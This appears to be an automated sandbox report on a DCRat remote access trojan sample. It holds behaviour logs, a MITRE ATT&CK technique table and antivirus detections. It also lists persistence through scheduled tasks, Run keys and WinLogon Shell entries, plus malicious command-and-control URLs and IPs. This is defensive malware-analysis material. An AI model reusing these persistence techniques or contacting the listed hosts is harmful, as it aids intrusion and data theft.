                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe Queries volume information: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe VolumeInformation
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Queries volume information: C:\hyperContaineragent\Bridgecommon.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exe Code function: 0_2_00CBDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00CBDF1E
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exe Code function: 0_2_00CAB146 GetVersionExW, 0_2_00CAB146
                                    Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                    Stealing of Sensitive Information

                                    Source: Yara match File source: 00000005.00000002.1943082141.0000000013491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: Process Memory Space: Bridgecommon.exe PID: 7636, type: MEMORYSTR
                                    Source: Yara match File source: Process Memory Space: nFQRHbQjcuhfqIAubZpdQD.exe PID: 6624, type: MEMORYSTR
                                    Source: Yara match File source: 3AAyq819Vy.exe, type: SAMPLE
                                    Source: Yara match File source: 0.3.3AAyq819Vy.exe.63f9700.0.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 5.0.Bridgecommon.exe.f70000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 0.3.3AAyq819Vy.exe.4d94700.1.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 00000000.00000003.1725117408.0000000004D46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000005.00000000.1861446770.0000000000F72000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000000.00000003.1724034780.00000000063AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, type: DROPPED
                                    Source: Yara match File source: C:\hyperContaineragent\Bridgecommon.exe, type: DROPPED

Remote Access Functionality

Source: Yara match; File source: 00000005.00000002.1943082141.0000000013491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Bridgecommon.exe PID: 7636, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: nFQRHbQjcuhfqIAubZpdQD.exe PID: 6624, type: MEMORYSTR
Source: Yara match; File source: 3AAyq819Vy.exe, type: SAMPLE
Source: Yara match; File source: 0.3.3AAyq819Vy.exe.63f9700.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.Bridgecommon.exe.f70000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.3AAyq819Vy.exe.4d94700.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000003.1725117408.0000000004D46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.1861446770.0000000000F72000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.1724034780.00000000063AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, type: DROPPED
Source: Yara match; File source: C:\hyperContaineragent\Bridgecommon.exe, type: DROPPED

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 11 Process Injection | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Clipboard Data | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 21 Registry Run Keys / Startup Folder | 21 Registry Run Keys / Startup Folder | 3 Obfuscated Files or Information | Security Account Manager | 147 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 13 Software Packing | NTDS | 231 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 243 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

[Behavior graph. Behavior Graph ID: 1549729, Sample: 3AAyq819Vy.exe, Startdate: 05/11/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 3AAyq819Vy.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| 3AAyq819Vy.exe | 100% | Avira | VBS/Runner.VPG | |
| 3AAyq819Vy.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | 100% | Avira | HEUR/AGEN.1323342 | |
| C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe | 100% | Avira | VBS/Runner.VPG | |
| C:\hyperContaineragent\Bridgecommon.exe | 100% | Avira | HEUR/AGEN.1323342 | |
| C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat | 100% | Avira | BAT/Delbat.C | |
| C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | 100% | Joe Sandbox ML | | |
| C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\izhrsOEp.log | 100% | Joe Sandbox ML | | |
| C:\hyperContaineragent\Bridgecommon.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\EEEoXuLc.log | 100% | Joe Sandbox ML | | |
| C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\ProgramData\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\ProgramData\nFQRHbQjcuhfqIAubZpdQD.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\EEEoXuLc.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\WWLLRmVS.log | 24% | ReversingLabs | | |
| C:\Users\user\Desktop\izhrsOEp.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\tYJQSSrA.log | 24% | ReversingLabs | | |
| C:\hyperContaineragent\Bridgecommon.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php | 100% | Avira URL Cloud | malware | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| 861848cm.nyashkoon.ru | 37.44.238.250 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php | true | Avira URL Cloud: malware | unknown |

| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 37.44.238.250 | 861848cm.nyashkoon.ru | France | | 49434 | HARMONYHOSTING-ASFR | true |

| IP |
|---|
| 127.0.0.1 |

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1549729
Start date and time: 2024-11-05 23:51:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 58
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 3AAyq819Vy.exe
renamed because original name is a hash value
Original Sample Name: 059DD6A8CB2D31871BB82DBB158965FA.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winEXE@53/56@1/2
EGA Information:
• Successful, ratio: 25%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, schtasks.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Bridgecommon.exe, PID 1816 because it is empty
• Execution Graph export aborted for target Bridgecommon.exe, PID 7052 because it is empty
• Execution Graph export aborted for target Bridgecommon.exe, PID 7780 because it is empty
• Execution Graph export aborted for target nFQRHbQjcuhfqIAubZpdQD.exe, PID 6624 because it is empty
• Execution Graph export aborted for target nFQRHbQjcuhfqIAubZpdQD.exe, PID 7104 because it is empty
• Execution Graph export aborted for target nFQRHbQjcuhfqIAubZpdQD.exe, PID 7636 because it is empty
• HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: 3AAyq819Vy.exe
                                                                        Time | Type | Description
                                                                        17:52:22 | API Interceptor | 166x Sleep call for process: powershell.exe modified
                                                                        17:52:31 | API Interceptor | 2264545x Sleep call for process: nFQRHbQjcuhfqIAubZpdQD.exe modified
                                                                        17:52:32 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                                        22:52:21 | Task Scheduler | Run new task: Bridgecommon path: "C:\hyperContaineragent\Bridgecommon.exe"
                                                                        22:52:21 | Task Scheduler | Run new task: BridgecommonB path: "C:\hyperContaineragent\Bridgecommon.exe"
                                                                        22:52:22 | Task Scheduler | Run new task: nFQRHbQjcuhfqIAubZpdQD path: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:52:22 | Task Scheduler | Run new task: nFQRHbQjcuhfqIAubZpdQDn path: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:52:23 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQD "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:52:32 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Bridgecommon "C:\hyperContaineragent\Bridgecommon.exe"
                                                                        22:52:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQD "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:52:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Bridgecommon "C:\hyperContaineragent\Bridgecommon.exe"
                                                                        22:52:57 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQD "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:53:07 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Bridgecommon "C:\hyperContaineragent\Bridgecommon.exe"
                                                                        22:53:24 | Autostart | Run: WinLogon Shell "C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:53:32 | Autostart | Run: WinLogon Shell "C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:53:41 | Autostart | Run: WinLogon Shell "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:53:50 | Autostart | Run: WinLogon Shell "C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:53:59 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:54:08 | Autostart | Run: WinLogon Shell "C:\hyperContaineragent\Bridgecommon.exe"
                                                                        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                        37.44.238.250 | HcEvQKWAu2.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
                                                                         | k1iZHyRK6K.exe | Get hash | malicious | DCRat | Browse | 452132cm.n9shteam2.top/Processdownloads.php
                                                                         | FuWRu2Mg82.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
                                                                         | cGZV10VyWC.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
                                                                         | qZoQEFZUnv.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | rollsroys.top/externaljsapisql.php
                                                                         | QDJA9geR12.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | merlion.top/PythongameTrafficDatalifepublic.php
                                                                         | Q9AQFOA6YC.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 492668cm.newnyash.top/ToSecureLowProcessordefaultDatalifeCentral.php
